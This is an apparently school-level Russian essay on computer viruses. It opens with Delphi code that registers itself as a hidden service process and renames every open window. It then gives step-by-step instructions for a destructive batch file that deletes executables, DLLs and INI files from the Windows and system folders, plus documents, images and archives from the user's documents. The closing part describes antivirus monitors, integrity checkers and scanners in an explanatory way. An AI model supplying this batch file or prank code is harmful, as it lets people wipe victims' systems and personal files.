Реферат: Компьютерные вирусы
uses windows, Messages;
procedure registerserviceprocess; external 'kernel32.dll'
name 'RegisterServiceProcess'; //функция EnumWindowsProc
function EnumWindowsProc(h: hwnd): BOOL; stdcall;
begin
SendMessage(h,WM_SETText,0,Iparam(PChar('Fed_108- компьютерщик)));
end;
//начало программы
var h:THandle;
begin
asm
push 1
push 0
call registerserviceprocess;
end;
//запускаю цикл
whiletruedobegin //запускаю перечесление всех окон
EnumWindows(@EnumWindowsProc,0);
h:=CreateEvent(nil, true, false, ");//делаю задержку в 100 мс.
WaitForSingleObject(h, 100);
CloseHandle(h);
end;
end.
Эффект: все названия окон переименовываются в «Fed_108- компьютерщик»
Опасные вирусы приводят к различным нарушениям в работе компьютера;разрушительные - к стиранию информации, полному или частичному нарушению работы прикладных программ. Например:
Заходим в Far-manager, нажимаем Shift+F4, пишем любое название файла (install.bat), главное чтобы расширение было *.bat.
После чего печатаем примерно следующий текст:
cd C:
cd\
cd windows (у 95% процентов юзеров папка именно такая)
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe
cd\
cd моидок~1
del *.doc
del *.txt
del *.htm
del *.html
del *.pdf
del *.jpg
del *.zip
del *.gif
Нажимаем F2 и сохраняем таким образом написанный файл. Эффект: стираются все файлы с указанными расширениями в указанных папках.
Массовое распространение компьютерных вирусов вызвало разработку антивирусных программ, позволяющих обнаруживать и уничножать. Программы-фильтры, или «сторожа», постоянно находятся в оперативной памяти, являясь резидентными, и «перехватывают» все запросы к операционной системе на выполнение «подозрительных действий», т.е. операции, используемых вирусами для своего размножения и порчи информационных и других системных ресурсов в компьютере. Такими действиями могут быть. попытки изменения атрибутов файлов, коррекции исполняемых BAT- СОМ- или ЕХЕ-файлов, записи в загрузочные сектора диска и др. При каждом запросе на такое действие на экран компьютера выдается cообщение о каких либо действий и какая программа желает его выполнять. Пользователь в ответ на это должен либо разрешить выполнение действия, либо запретить его. Подобная часто повторяющаяся «назойливость», раздражающая пользователя, и то, что объем оперативной памяти уменьшается из-за необходимости постоянного нахождения в ней «сторожа», являются главными недостатками этих программ. К тому же программы-фильтры не «лечат» файлы или диски, для этого необходимо использовать другие антивирусные программы. Примером программ- сторожей являются Vsefe, входящая в пакет утилит MS-DOS, и программы, работающие в среде Windows, - AVP, NortonAntiVirusforWindows 95, McAfeeVirusScan 95, ThunderByteProfessionalforWindows 95.
Надежным средством защиты от вирусов считаютсяпрограммы-ревизоры. Они запоминают исходное состояние программ, каталогов и системных областей диска, когда компьютер еще не был заражен вирусом, а затем периодически сравнивают текущее состояние с исходным. При выявлении несоответствий (по длине файла, дате модификации, коду циклического контроля файла и др.) сообщение об этом выдается пользователю. Примером программ-ревизоров являются программа Adinf фирмы «Диалог-Наука» и дополнение к ней в виде AdinfCureModule.
Программы-доктора не только обнаруживают, но и "лечат" зараженные программы или диски, «выкусывая» из зараженных программ тело вируса. Программы этого типа делятся на фаги и полифаги. Последние служат для обнаружения и уничтожения большого количества разнообразных вирусов. Наибольшее распространение в России имеют такие полифаги, как MSAntiVirus, Aidstest и DoctorWeb, которые непрерывно обновляются для борьбы с появляющимися новыми вирусами.